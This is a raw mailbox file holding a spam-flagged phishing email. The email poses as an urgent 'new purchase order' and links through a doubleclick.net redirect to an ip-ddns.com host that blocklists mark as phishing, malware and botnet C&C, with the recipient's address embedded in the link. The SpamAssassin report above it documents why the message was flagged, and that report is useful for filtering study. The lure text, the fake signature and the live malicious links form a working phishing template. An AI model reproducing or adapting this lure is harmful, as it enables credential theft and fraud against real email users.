OwlCyberSecurity - MANAGER

Edit File: 1747312436.M25291P3180419.premium128.web-hosting.com,S=9933,W=10094:2,

Envelope-to: brahim.chabana@gourayafroid.com
Delivery-date: Thu, 15 May 2025 08:33:56 -0400
From: "Said: Shweta..V" <srv1cpanel.webadmin-notify@adminwebonline.com>
To: brahim.chabana@gourayafroid.com
Date: 15 May 2025 05:44:55 +0200
Message-ID: <20250515054455.940EA412E5CA8324@adminwebonline.com>
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
    
 Content analysis details:   (16.4 points, 5.0 required)
  pts rule name              description
 ---- ---------------------- --------------------------------------------------
  1.2 RCVD_IN_BL_SPAMCOP_NET RBL: Received via a relay in bl.spamcop.net
               [Blocked - see <https://www.spamcop.net/bl.shtml?196.251.93.58>]
  0.0 URIBL_BLOCKED          ADMINISTRATOR NOTICE: The query to URIBL was blocked.
                             See
                             http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
                              for more information.
                             [URI: doubleclick.net]
                             [URI: ip-ddns.com]
                             [URI: zohosecurepay.com]
                             [URI: adminwebonline.com]
                             [URI: gourayafroid.com]
  0.1 URIBL_SBL_A            Contains URL's A record listed in the Spamhaus SBL
                             blocklist
                             [URI: adminwebonline.com/196.251.93.58]
           [URI: bn2prjvyjtf3xbez67cbc4idu5wyp0w3of.ip-ddns.com/196.251.115.28]
  0.1 URIBL_CSS_A            Contains URL's A record listed in the Spamhaus CSS
                             blocklist
                             [URI: adminwebonline.com/196.251.93.58]
  1.9 URIBL_ABUSE_SURBL      Contains an URL listed in the ABUSE SURBL blocklist
                             [URI: adminwebonline.com]
  2.5 URIBL_DBL_PHISH        Contains a Phishing URL listed in the Spamhaus DBL
                             blocklist
                          [URI: bn2prjvyjtf3xbez67cbc4idu5wyp0w3of.ip-ddns.com]
  2.5 URIBL_DBL_BOTNETCC     Contains a botned C&C URL listed in the Spamhaus
                             DBL blocklist
                          [URI: bn2prjvyjtf3xbez67cbc4idu5wyp0w3of.ip-ddns.com]
  2.5 URIBL_DBL_MALWARE      Contains a malware URL listed in the Spamhaus DBL
                             blocklist
                          [URI: bn2prjvyjtf3xbez67cbc4idu5wyp0w3of.ip-ddns.com]
  4.5 URIBL_DBL_SPAM         Contains a spam URL listed in the Spamhaus DBL
                             blocklist
                             [URI: adminwebonline.com]
  0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to
                              Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                             [196.251.93.58 listed in bl.score.senderscore.com]
  0.0 RCVD_IN_VALIDITY_SAFE_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to
                              Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                             [196.251.93.58 listed in sa-accredit.habeas.com]
  0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE: The
                             query to Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                          [196.251.93.58 listed in sa-trusted.bondedsender.org]
 -0.0 SPF_PASS               SPF: sender matches SPF record
 -0.1 DKIM_VALID_EF          Message has a valid DKIM or DK signature from
                             envelope-from domain
 -0.1 DKIM_VALID             Message has at least one valid DKIM or DK signature
 -0.1 DKIM_VALID_AU          Message has a valid DKIM or DK signature from author's
                             domain
  0.1 DKIM_SIGNED            Message has a DKIM or DK signature, not necessarily valid
  1.1 DATE_IN_PAST_06_12     Date: is 6 to 12 hours before Received: date
  0.0 HTML_MESSAGE           BODY: HTML included in message
  0.1 MIME_HTML_ONLY         BODY: Message only has text/html MIME parts
  0.0 T_MXG_EMAIL_FRAG       BODY: URI with email in fragment
X-Spam-Flag: YES
Subject:  ***SPAM***  Fwd: NEW PURCHASE ORDERS FROM gourayafroid.com

<html><head>
<meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3Dedge">
</head>
<body>
<div class=3D"ii gt" id=3D":568" style=3D'margin: 8px 0px 0px; padding: 0px=
; left: 11px; top: 14px; color: rgb(34, 34, 34); text-transform: none; text=
-indent: 0px; letter-spacing: normal; font-family: "Google Sans", Roboto, R=
obotoDraft, Helvetica, Arial, sans-serif; font-size: 0.87rem; font-style: n=
ormal; font-weight: 400; word-spacing: 0px; white-space: normal; position: =
relative; direction: ltr; -ms-overflow-x: hidden; orphans: 2; widows: 2; ba=
ckground-color: rgb(255, 255, 255);=20
font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-str=
oke-width: 0px; text-decoration-thickness: initial; text-decoration-style: =
initial; text-decoration-color: initial;' jslog=3D"20277; u014N:xr6bB; 1:Wy=
IjdGhyZWFkLWY6MTgzMDQ4MzAwMTk1MTE0Mzg0OCJd; 4:WyIjbXNnLWY6MTgzMDQ4MzAwMTk1M=
TE0Mzg0OCIsbnVsbCxudWxsLG51bGwsMSwwLFsxLDAsMF0sMTU1LDEwNDIsbnVsbCxudWxsLG51=
bGwsbnVsbCxudWxsLDEsbnVsbCxudWxsLFswXSxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnV=
sbCwwXQ..">
<div class=3D"a3s aiL " id=3D":55w" style=3D"font: small/1.5 Arial, Helveti=
ca, sans-serif; position: relative; direction: ltr; font-size-adjust: none;=
 font-stretch: normal;"><div dir=3D"ltr"><div class=3D"gmail_quote">My gree=
tings to you.<br><br>With reference to our previous inquiry.<br><br>Please =
confirm our new orders,<br><br>payment will proceed asap after your confirm=
ation.<br><br>note: very Urgent<br><br>This&nbsp;NEW ORDER&nbsp;can be view=
ed, printed or downloaded as PDF from the link below.<br>
<br>
<a style=3D"color: rgb(17, 85, 204);" href=3D"https://googleads.g.doublecli=
ck.net/pcs/click?xai=3DAKAOjssIdZGtK2LGw4coQMwtQcONuf8cVZUVHUrlFgT33_wiLCux=
poweUvHdBH9neY4iW-CZh2SzgITptx6j64F0B2pEU0uoeRfmKTeyn7LSG5Irubqjv6IFl9MeqTp=
84ZT99WRJlZDMgrwUaUI7QjgNwL22AVveJm980wuVNryiILT2WhxCPmcY8M7PVIOygAXT_382p7=
PUn7bIByn2OjlTfCiaqta3tAhZWCuROeXZPznm5cGhgUYspVywPb8Y8GbuT5pyEUyF89icmqe5z=
g&sig=3DCg0ArKJSzFtr0kI2Y6Ll&adurl=3Dhttps://bn2prjvyjtf3xbez67cbc4idu5wyp0=
w3of.ip-ddns.com#brahim.chabana@gourayafroid.com" target=3D"_blank"=20
data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://zohosecurepa=
y.com/invoice/chriskudenterprisespvtltd/secure?CEstimateID%3D2-11d7fd33ba81=
9cce15ed4a31d70f72e99fa6b9bc964c326e7d3eed24b64376c13625b10104caa5b8abde30d=
1eeb296c6a56f5c2922c752556d4749767d3e1379cb7cd4ac746585eb&amp;source=3Dgmai=
l&amp;ust=3D1745776920123000&amp;usg=3DAOvVaw0dvllNf3n8suNlA6XaBw5x">VIEW N=
EW ORDER</a><br><br>Thanks &amp; regard<br>Said: Shweta..V<br><br>Purchasin=
g Administrator<br>
 shubbpsyllium Reproductions Company Ltd.<br>Unit C, Hanbury Road, Stoke Pr=
ior,saudi arabia<br>Bromsgrove, B60 4AE.<br>Tel: 01527 578484 Fax: 01527 57=
8585<br>mobile: +66 93790201<br><br><br><div class=3D"yj6qo"></div><div cla=
ss=3D"adL"><br></div></div></div><div class=3D"adL"></div></div></div>
<div class=3D"hq gt" id=3D":54b" style=3D'margin: 15px 0px; color: rgb(34, =
34, 34); text-transform: none; text-indent: 0px; letter-spacing: normal; cl=
ear: both; font-family: "Google Sans", Roboto, RobotoDraft, Helvetica, Aria=
l, sans-serif; font-size: 0.87rem; font-style: normal; font-weight: 400; wo=
rd-spacing: 0px; white-space: normal; orphans: 2; widows: 2; background-col=
or: rgb(255, 255, 255); font-variant-ligatures: normal; font-variant-caps: =
normal; -webkit-text-stroke-width: 0px;=20
text-decoration-thickness: initial; text-decoration-style: initial; text-de=
coration-color: initial;'><br class=3D"Apple-interchange-newline"></div></b=
ody></html>